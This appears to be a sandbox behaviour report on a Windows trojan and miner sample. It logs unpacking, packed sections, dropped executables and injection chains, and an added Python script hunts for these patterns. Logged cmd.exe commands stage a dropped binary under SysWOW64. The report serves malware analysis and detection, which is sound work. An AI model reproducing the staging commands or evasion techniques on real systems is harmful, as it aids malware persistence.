                      Source: 656C.exe.11.drStatic PE information: Section: .rsrc ZLIB complexity 0.997721976577
                      Source: 7480.exe.11.drStatic PE information: Section: ZLIB complexity 1.00044194799
                      Source: 7480.exe.11.drStatic PE information: Section: ZLIB complexity 1.00537109375
                      Source: 7480.exe.11.drStatic PE information: Section: ZLIB complexity 1.00051229508
                      Source: 7480.exe.11.drStatic PE information: Section: ZLIB complexity 1.0107421875
                      Source: 9ro85QVN0F.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl
                      Source: classification engineClassification label: mal100.troj.evad.mine.winEXE@41/30@88/11
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeFile read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeCode function: 25_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                      Source: 9ro85QVN0F.exeVirustotal: Detection: 37%
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Users\user\Desktop\9ro85QVN0F.exe "C:\Users\user\Desktop\9ro85QVN0F.exe"
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeProcess created: C:\Users\user\Desktop\9ro85QVN0F.exe "C:\Users\user\Desktop\9ro85QVN0F.exe"
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown | Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown | Process created: C:\Users\user\AppData\Roaming\iscgwer C:\Users\user\AppData\Roaming\iscgwer
Source: C:\Users\user\AppData\Roaming\iscgwer | Process created: C:\Users\user\AppData\Roaming\iscgwer C:\Users\user\AppData\Roaming\iscgwer
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\411E.exe C:\Users\user\AppData\Local\Temp\411E.exe
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\53DC.exe C:\Users\user\AppData\Local\Temp\53DC.exe
Source: C:\Users\user\AppData\Local\Temp\53DC.exe | Process created: C:\Users\user\AppData\Local\Temp\53DC.exe C:\Users\user\AppData\Local\Temp\53DC.exe
Source: C:\Users\user\AppData\Local\Temp\411E.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4256 -s 520
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\E6C4.exe C:\Users\user\AppData\Local\Temp\E6C4.exe
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\F4CF.exe C:\Users\user\AppData\Local\Temp\F4CF.exe
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\FD6B.exe C:\Users\user\AppData\Local\Temp\FD6B.exe
Source: C:\Windows\System32\svchost.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\wuapihost.exe C:\Windows\System32\wuapihost.exe -Embedding
Source: C:\Users\user\AppData\Local\Temp\F4CF.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /C mkdir C:\Windows\SysWOW64\jdijwvkg\
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\F4CF.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\bzxmernq.exe" C:\Windows\SysWOW64\jdijwvkg\
Source: C:\Users\user\AppData\Local\Temp\FD6B.exe | Process created: C:\Users\user\AppData\Local\Temp\FD6B.exe C:\Users\user\AppData\Local\Temp\FD6B.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9ro85QVN0F.exe | Process created: C:\Users\user\Desktop\9ro85QVN0F.exe "C:\Users\user\Desktop\9ro85QVN0F.exe"
Source: C:\Windows\System32\svchost.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\411E.exe C:\Users\user\AppData\Local\Temp\411E.exe
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\53DC.exe C:\Users\user\AppData\Local\Temp\53DC.exe
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\E6C4.exe C:\Users\user\AppData\Local\Temp\E6C4.exe
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\F4CF.exe C:\Users\user\AppData\Local\Temp\F4CF.exe
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\FD6B.exe C:\Users\user\AppData\Local\Temp\FD6B.exe
Source: C:\Users\user\AppData\Roaming\iscgwer | Process created: C:\Users\user\AppData\Roaming\iscgwer C:\Users\user\AppData\Roaming\iscgwer
Source: C:\Users\user\AppData\Local\Temp\53DC.exe | Process created: C:\Users\user\AppData\Local\Temp\53DC.exe C:\Users\user\AppData\Local\Temp\53DC.exe
Source: C:\Users\user\AppData\Local\Temp\FD6B.exe | Process created: C:\Users\user\AppData\Local\Temp\FD6B.exe C:\Users\user\AppData\Local\Temp\FD6B.exe
Source: C:\Users\user\AppData\Local\Temp\FD6B.exe | Process created: unknown unknown
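The process-creation rows above carry the three chains the report turns into verdicts: the injected explorer.exe starting payloads it dropped in %TEMP%, binaries relaunching their own image before the "process hollowing" verdict, and the F4CF.exe/cmd.exe mkdir-and-move pair that stages bzxmernq.exe under SysWOW64. The script below is an added example, not part of the Joe Sandbox report: it parses rows in the report's format into (parent, child image, command line) events, builds the process tree, and applies three hunting rules. The embedded rows are copied from this report (a representative subset, with a `|` between the report's two columns); the rule names and matching logic are the example's own and are not how the sandbox computes its verdicts.

```python
"""Hunting over the report's "Process created" rows.

Added example (not from the Joe Sandbox report): parse rows into
(parent, image, cmdline) events, build the process tree, and apply three
rules that match what the report flags for this sample. The rule names and
matching logic are the example's own.
"""
import re
from collections import defaultdict

# Rows copied from the report (representative subset), '|' between its two columns.
REPORT_ROWS = r"""
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\411E.exe C:\Users\user\AppData\Local\Temp\411E.exe
Source: C:\Users\user\AppData\Local\Temp\53DC.exe | Process created: C:\Users\user\AppData\Local\Temp\53DC.exe C:\Users\user\AppData\Local\Temp\53DC.exe
Source: C:\Users\user\AppData\Local\Temp\F4CF.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /C mkdir C:\Windows\SysWOW64\jdijwvkg\
Source: C:\Users\user\AppData\Local\Temp\F4CF.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\bzxmernq.exe" C:\Windows\SysWOW64\jdijwvkg\
Source: C:\Users\user\Desktop\9ro85QVN0F.exe | Process created: C:\Users\user\Desktop\9ro85QVN0F.exe "C:\Users\user\Desktop\9ro85QVN0F.exe"
Source: C:\Windows\System32\svchost.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Users\user\AppData\Local\Temp\FD6B.exe | Process created: unknown unknown
"""

# The '|' is optional so rows pasted straight from the rendered report (where the
# parent path runs into "Process created:") parse too. The child image may contain
# spaces, so it ends where the command line (a quoted or bare drive path, or the
# literal "unknown") begins.
ROW = re.compile(r'^Source:\s*(?P<parent>.*?)\s*\|?\s*Process created:\s*'
                 r'(?P<image>.+?)\s+(?P<cmdline>"?[A-Za-z]:\\.*|unknown.*)$')


def parse_rows(text):
    """(parent, image, cmdline) for every row that matches; other lines are skipped."""
    events = []
    for line in text.strip().splitlines():
        m = ROW.match(line.strip())
        if m:
            events.append((m["parent"], m["image"], m["cmdline"]))
    return events


def process_tree(events):
    """Parent image -> list of child images, in report order."""
    tree = defaultdict(list)
    for parent, image, _ in events:
        tree[parent].append(image)
    return dict(tree)


def hunt(events):
    """Apply the three rules; returns (rule, parent, evidence) tuples."""
    hits = []
    for parent, image, cmdline in events:
        p, c, cl = parent.lower(), image.lower(), cmdline.lower()
        # 1. The shell launching a binary from %TEMP%: the report's injected
        #    explorer.exe drops and starts 411E.exe, 53DC.exe, ... this way.
        if p.endswith("\\explorer.exe") and "\\appdata\\local\\temp\\" in c:
            hits.append(("explorer spawned binary from %TEMP%", parent, image))
        # 2. An image starting a second copy of itself: the pattern behind the
        #    report's hollowing verdict (the child is the injection target).
        if p == c and p != "unknown":
            hits.append(("image re-executes itself (hollowing candidate)", parent, image))
        # 3. cmd.exe creating or filling a directory under the Windows tree, as in
        #    the mkdir/move pair that stages bzxmernq.exe under SysWOW64.
        if c.endswith("\\cmd.exe") and "/c" in cl:
            command = cl.split("/c", 1)[1]
            if any(v in command for v in ("mkdir", "move", "copy")) and (
                    "\\windows\\syswow64\\" in command or "\\windows\\system32\\" in command):
                hits.append(("cmd.exe stages files under a Windows system directory",
                             parent, cmdline))
    return hits


if __name__ == "__main__":
    for rule, parent, evidence in hunt(parse_rows(REPORT_ROWS)):
        print("%-55s %s -> %s" % (rule, parent, evidence))
```

Rule 2 is deliberately narrow: a process re-executing its own image is common in legitimate software too (updaters, elevation), so on a real endpoint it belongs in a chain with the dropper's origin rather than as a standalone alert; rule 3 only looks at the text after the `/C` switch so the path of cmd.exe itself under SysWOW64 does not trigger it.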
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\411E.tmp
Source: C:\Users\user\Desktop\9ro85QVN0F.exe | Code function: 0_2_00419D0A SetLastError,GetConsoleCursorInfo,GetProfileStringA,WriteProfileSectionW,GetProfileStringA,GetLastError,GetSystemWow64DirectoryW,GetWindowsDirectoryW,GetCPInfoExA,GetDiskFreeSpaceExA,GetStartupInfoW,ReadConsoleOutputCharacterW,GlobalUnWire,GetProcessHeap,GetProcessHeaps,WritePrivateProfileStringA,SetPriorityClass,
Source: C:\Users\user\AppData\Local\Temp\FD6B.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6344:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5320:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4256
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3932:120:WilError_01
Source: C:\Users\user\Desktop\9ro85QVN0F.exe | Command line argument: 0.0
Source: C:\Users\user\Desktop\9ro85QVN0F.exe | Command line argument: hijaduvinijebup
Source: C:\Users\user\Desktop\9ro85QVN0F.exe | Command line argument: mocisacatenu
Source: C:\Users\user\Desktop\9ro85QVN0F.exe | Command line argument: wapejan
Source: C:\Users\user\Desktop\9ro85QVN0F.exe | Command line argument: wovag
Source: C:\Users\user\Desktop\9ro85QVN0F.exe | Command line argument: cbH
Source: C:\Users\user\Desktop\9ro85QVN0F.exe | Command line argument: Piruvora
Source: C:\Users\user\Desktop\9ro85QVN0F.exe | Command line argument: gukafipa
Source: C:\Users\user\Desktop\9ro85QVN0F.exe | Command line argument: mawecamaxe
Source: C:\Users\user\Desktop\9ro85QVN0F.exe | Command line argument: Hiwejanoji
Source: C:\Users\user\Desktop\9ro85QVN0F.exe | Command line argument: Pusazide
Source: C:\Users\user\Desktop\9ro85QVN0F.exe | Command line argument: hukujid
Source: C:\Users\user\AppData\Local\Temp\F4CF.exe | Command line argument: cbH
Source: C:\Users\user\AppData\Local\Temp\F4CF.exe | Command line argument: cbH
Source: FD6B.exe.11.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
Source: FD6B.exe.11.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 26.0.FD6B.exe.cf0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 26.0.FD6B.exe.cf0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 26.2.FD6B.exe.cf0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 26.2.FD6B.exe.cf0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 26.0.FD6B.exe.cf0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 26.0.FD6B.exe.cf0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 26.0.FD6B.exe.cf0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 26.0.FD6B.exe.cf0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 26.0.FD6B.exe.cf0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 26.0.FD6B.exe.cf0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\411E.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: 9ro85QVN0F.exe | Static PE information: More than 200 imports for KERNEL32.dll
Source: 9ro85QVN0F.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 9ro85QVN0F.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 9ro85QVN0F.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 9ro85QVN0F.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 9ro85QVN0F.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 9ro85QVN0F.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 9ro85QVN0F.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\beritu100-kif-hi.pdb source: F4CF.exe, 00000019.00000000.409125786.0000000000401000.00000020.00020000.sdmp, F4CF.exe.11.dr, bzxmernq.exe.25.dr
Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 411E.exe, 00000013.00000000.399120089.0000000000413000.00000002.00020000.sdmp, 411E.exe, 00000013.00000000.385802310.0000000000413000.00000002.00020000.sdmp, 411E.exe.11.dr
Source: Binary string: C:\coduluvi\vebazomimohey20-dubelat-cudecufoc 51\muzavibow63 r.pdb source: FE11.exe.11.dr, 433C.exe.11.dr
Source: Binary string: @RC:\jadawac53 buxabalafubiro.pdbh source: D54.exe.11.dr
Source: Binary string: C:\wufiruy\zoji_batodetumoz97\toboyese.pdb source: E6C4.exe, 00000018.00000000.402465553.0000000000401000.00000020.00020000.sdmp, E6C4.exe.11.dr
Source: Binary string: _TC:\wufiruy\zoji_batodetumoz97\toboyese.pdbh source: E6C4.exe, 00000018.00000000.402465553.0000000000401000.00000020.00020000.sdmp, E6C4.exe.11.dr
Source: Binary string: fHSC:\kaya\ginonohu.pdbh source: 9ro85QVN0F.exe, iscgwer.11.dr, 53DC.exe.11.dr
Source: Binary string: \C:\coduluvi\vebazomimohey20-dubelat-cudecufoc 51\muzavibow63 r.pdb source: FE11.exe.11.dr, 433C.exe.11.dr
Source: Binary string: C:\beritu100-kif-hi.pdbh source: F4CF.exe, 00000019.00000000.409125786.0000000000401000.00000020.00020000.sdmp, F4CF.exe.11.dr, bzxmernq.exe.25.dr
Source: Binary string: C:\jadawac53 buxabalafubiro.pdb source: D54.exe.11.dr
Source: Binary string: C:\kaya\ginonohu.pdb source: 9ro85QVN0F.exe, iscgwer.11.dr, 53DC.exe.11.dr
Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 411E.exe, 00000013.00000000.399120089.0000000000413000.00000002.00020000.sdmp, 411E.exe, 00000013.00000000.385802310.0000000000413000.00000002.00020000.sdmp, 411E.exe.11.dr

Data Obfuscation:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\E6C4.exe | Unpacked PE file: 24.2.E6C4.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\F4CF.exe | Unpacked PE file: 25.2.F4CF.exe.400000.0.unpack
Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Local\Temp\E6C4.exe | Unpacked PE file: 24.2.E6C4.exe.400000.0.unpack .text:ER;.data:W;.zufow:W;.ruh:W;.yilub:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\F4CF.exe | Unpacked PE file: 25.2.F4CF.exe.400000.0.unpack .text:ER;.data:W;.gemuta:W;.yid:W;.yofuyiz:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
.NET source code contains method to dynamically call methods (often used by packers)
Source: 26.0.FD6B.exe.cf0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 26.2.FD6B.exe.cf0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 26.0.FD6B.exe.cf0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 26.0.FD6B.exe.cf0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 42.0.FD6B.exe.1a0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 42.0.FD6B.exe.1a0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: C:\Users\user\Desktop\9ro85QVN0F.exe | Code function: 0_2_00633634 push es; iretd
Source: C:\Users\user\Desktop\9ro85QVN0F.exe | Code function: 0_2_008E95C8 push esi; ret
Source: C:\Users\user\Desktop\9ro85QVN0F.exe | Code function: 0_2_008E962D push esi; ret
Source: C:\Users\user\Desktop\9ro85QVN0F.exe | Code function: 1_2_00401880 push esi; iretd
Source: C:\Users\user\Desktop\9ro85QVN0F.exe | Code function: 1_2_00402E94 push es; iretd
Source: C:\Users\user\Desktop\9ro85QVN0F.exe | Code function: 1_1_00402E94 push es; iretd
Source: C:\Users\user\AppData\Roaming\iscgwer | Code function: 16_2_00563634 push es; iretd
Source: C:\Users\user\AppData\Roaming\iscgwer | Code function: 17_2_00401880 push esi; iretd
Source: C:\Users\user\AppData\Roaming\iscgwer | Code function: 17_2_00402E94 push es; iretd
Source: C:\Users\user\AppData\Local\Temp\411E.exe | Code function: 19_2_00412CA4 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\53DC.exe | Code function: 20_2_00633634 push es; iretd
Source: C:\Users\user\AppData\Local\Temp\53DC.exe | Code function: 20_2_008595C8 push esi; ret
Source: C:\Users\user\AppData\Local\Temp\53DC.exe | Code function: 20_2_0085962D push esi; ret
Source: C:\Users\user\AppData\Local\Temp\53DC.exe | Code function: 22_2_00401880 push esi; iretd
Source: C:\Users\user\AppData\Local\Temp\53DC.exe | Code function: 22_2_00402E94 push es; iretd
Source: C:\Users\user\AppData\Local\Temp\53DC.exe | Code function: 22_1_00402E94 push es; iretd
Source: C:\Users\user\AppData\Local\Temp\E6C4.exe | Code function: 24_2_004139B0 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\E6C4.exe | Code function: 24_2_0043ED0C push esp; retn 0043h
Source: C:\Users\user\AppData\Local\Temp\E6C4.exe | Code function: 24_2_00673C00 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\FD6B.exe | Code function: 26_2_00CF8508 push 00000028h; retf 0000h
Source: C:\Users\user\AppData\Local\Temp\FD6B.exe | Code function: 26_2_00CF764A push esp; ret
Source: C:\Users\user\AppData\Local\Temp\FD6B.exe | Code function: 26_2_013D4003 push esi; retf
Source: C:\Users\user\AppData\Local\Temp\FD6B.exe | Code function: 26_2_056F2503 push E80A995Eh; ret
Source: C:\Users\user\Desktop\9ro85QVN0F.exe | Code function: 0_2_0042D800 LoadLibraryW,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,
Source: 53A8.exe.11.dr | Static PE information: 0xAB35ADD6 [Sat Jan 8 14:57:26 2061 UTC]
Source: 9ro85QVN0F.exe | Static PE information: section name: .tad
Source: 9ro85QVN0F.exe | Static PE information: section name: .lux
Source: 9ro85QVN0F.exe | Static PE information: section name: .civujo
Source: D54.exe.11.dr | Static PE information: section name: .gizi
Source: D54.exe.11.dr | Static PE information: section name: .bur
Source: D54.exe.11.dr | Static PE information: section name: .wob
Source: 14F6.exe.11.dr | Static PE information: section name: .code
Source: 27E3.exe.11.dr | Static PE information: section name:
Source: 27E3.exe.11.dr | Static PE information: section name:
Source: 27E3.exe.11.dr | Static PE information: section name:
Source: 27E3.exe.11.dr | Static PE information: section name:
Source: 27E3.exe.11.dr | Static PE information: section name:
Source: 27E3.exe.11.dr | Static PE information: section name:
Source: 27E3.exe.11.dr | Static PE information: section name: .28gybOo
Source: 27E3.exe.11.dr | Static PE information: section name: .adata
Source: 53A8.exe.11.dr | Static PE information: section name: .didata
Source: 656C.exe.11.dr | Static PE information: section name: .code
Source: 7480.exe.11.dr | Static PE information: section name:
Source: 7480.exe.11.dr | Static PE information: section name:
Source: 7480.exe.11.dr | Static PE information: section name:
Source: 7480.exe.11.dr | Static PE information: section name:
Source: 7480.exe.11.dr | Static PE information: section name:
Source: 7480.exe.11.dr | Static PE information: section name:
Source: 7480.exe.11.dr | Static PE information: section name: .HQIHSjN
Source: 7480.exe.11.dr | Static PE information: section name: .adata
Source: 53DC.exe.11.dr | Static PE information: section name: .tad
Source: 53DC.exe.11.dr | Static PE information: section name: .lux
Source: 53DC.exe.11.dr | Static PE information: section name: .civujo
Source: E6C4.exe.11.dr | Static PE information: section name: .zufow
Source: E6C4.exe.11.dr | Static PE information: section name: .ruh
Source: E6C4.exe.11.dr | Static PE information: section name: .yilub
Source: F4CF.exe.11.dr | Static PE information: section name: .gemuta
Source: F4CF.exe.11.dr | Static PE information: section name: .yid
Source: F4CF.exe.11.dr | Static PE information: section name: .yofuyiz
Source: iscgwer.11.dr | Static PE information: section name: .tad
Source: iscgwer.11.dr | Static PE information: section name: .lux
Source: iscgwer.11.dr | Static PE information: section name: .civujo
Source: bzxmernq.exe.25.dr | Static PE information: section name: .gemuta
Source: bzxmernq.exe.25.dr | Static PE information: section name: .yid
Source: bzxmernq.exe.25.dr | Static PE information: section name: .yofuyiz
Source: initial sample | Static PE information: section where entry point is pointing to: .didata
Source: 27E3.exe.11.dr | Static PE information: real checksum: 0x3721bb should be: 0x373654
Source: FD6B.exe.11.dr | Static PE information: real checksum: 0x0 should be: 0x9011f
Source: 656C.exe.11.dr | Static PE information: real checksum: 0x0 should be: 0x67108
Source: 7480.exe.11.dr | Static PE information: real checksum: 0x36f63f should be: 0x375646
Source: 14F6.exe.11.dr | Static PE information: real checksum: 0x0 should be: 0x5ff14
Source: initial sample | Static PE information: section name: .text entropy: 6.96623040888
Source: initial sample | Static PE information: section name: .text entropy: 7.2566886804
Source: initial sample | Static PE information: section name: entropy: 7.99714766582
Source: initial sample | Static PE information: section name: entropy: 7.90784224501
Source: initial sample | Static PE information: section name: entropy: 7.99361781473
Source: initial sample | Static PE information: section name: entropy: 7.80912989946
Source: initial sample | Static PE information: section name: .rsrc entropy: 7.22348700263
Source: initial sample | Static PE information: section name: .28gybOo entropy: 7.91849564721
Source: initial sample | Static PE information: section name: .didata entropy: 7.99713235918
Source: initial sample | Static PE information: section name: entropy: 7.99714283383
Source: initial sample | Static PE information: section name: entropy: 7.90902856434
Source: initial sample | Static PE information: section name: entropy: 7.99421567253
Source: initial sample | Static PE information: section name: entropy: 7.80301292615
Source: initial sample | Static PE information: section name: .rsrc entropy: 7.22498051033
Source: initial sample | Static PE information: section name: .HQIHSjN entropy: 7.91963122451
Source: initial sample | Static PE information: section name: .text entropy: 6.96623040888
Source: initial sample | Static PE information: section name: .text entropy: 6.98155408377
Source: initial sample | Static PE information: section name: .text entropy: 6.96408793747
Source: initial sample | Static PE information: section name: .text entropy: 6.96623040888
Source: initial sample | Static PE information: section name: .text entropy: 6.96408793747
